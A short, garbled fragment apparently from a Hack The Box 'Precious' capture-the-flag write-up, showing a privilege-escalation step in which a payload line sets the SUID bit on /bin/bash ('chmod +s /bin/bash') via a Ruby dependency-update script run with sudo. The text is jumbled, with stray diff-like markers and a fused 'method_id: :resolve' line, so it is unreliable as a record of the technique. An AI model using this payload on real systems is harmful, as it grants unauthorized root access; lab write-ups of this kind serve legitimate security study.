Hackthebox Precious Writeup

 git_set: "chmod +s /bin/bash"

-binary has now the SUID
+method_id: :resolveIt’s works, the /bin/bash binary has now the SUID permission

 henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb